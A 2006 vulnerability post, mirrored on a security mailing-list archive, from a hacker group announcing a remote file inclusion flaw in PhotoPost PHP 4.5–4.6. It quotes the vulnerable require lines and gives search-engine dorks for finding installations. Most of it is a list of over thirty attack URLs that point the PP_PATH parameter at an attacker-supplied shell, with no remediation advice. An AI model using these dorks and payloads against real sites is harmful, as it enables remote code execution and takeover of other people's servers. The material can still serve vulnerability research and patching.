Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  BizDirectory all version xss

  Sql injection in Moodle

  MyBB 1.2 Full path and Cross site scripting vulnerabilities

  Q-Shop v3.5(browse.
asp) Remote SQL Injection Vulnerability

From:AG- Spider <ag-spider_(at)_msn.com>
Date:19.09.2006
Subject:PhotoPost PHP 4.6 - 4.5 [PP_PATH] >> Remote File Include Vulnerability

#################################################################################
#####
#
#     PhotoPost PHP  4.6 - 4.5 [PP_PATH] >> Remote File Include
Vulnerability
#
#################################################################################
#####
#      Found by ..........: AG-Spider
#      our Web Site : ----  http://www.ArabAttack.com
#                      Arab Attack Security Team
#################################################################################
#####
#      Affected Software .: PhotoPost PHP
#      Vendor ............: http://www.popphoto.com
#      Risk & Class...: high-Remote File Inclusion
#      C0ntAct ...........: AG-Spider [at] msn [dot] com
#################################################################################
#####
#
#             require "pp-inc.php";
#             require "$PP_PATH/languages/$pplang/addfav.php";
#             require "$PP_PATH/login-inc.php";
#
#################################################################################
#####
#       Dork :"Powered by: PhotoPost PHP 4.6"
#                  "Powered by: PhotoPost PHP 4.5"
#
#     Exploit :-
#
#     http://[target]/[path]/addfav.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-admlog.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-approve.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-backup.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-cats.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-cinc.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-db.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-editcfg.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-inc.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-index.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-modcom.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-move.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-options.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-order.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-pa.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-photo.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-purge.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-style.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-templ.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-userg.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-users.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/bulkupload.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/cookies.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/comments.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/ecard.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/editphoto.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/register.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/showgallery.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/showmembers.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/useralbums.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/uploadphoto.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/search.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-menu.php?PP_PATH=[Attack Shell]?
#################################################################################
#####
#
#
#     Greets 2 : Black-c0de <> KaBaRa.HaCk.eGy <> KILLERxXx <>
CRASH_OVER_RIDE <> SwEEt-deVil <> Young Hacker
#     our Web Site : ----  http://www.ArabAttack.com
#                      Arab Attack Security Team
#################################################################################
#####
#
#     thx 2 :::::: Lezr.com
#
#################################################################################
#####

_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters!
http://www.msn.co.uk/newsletters

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru
test server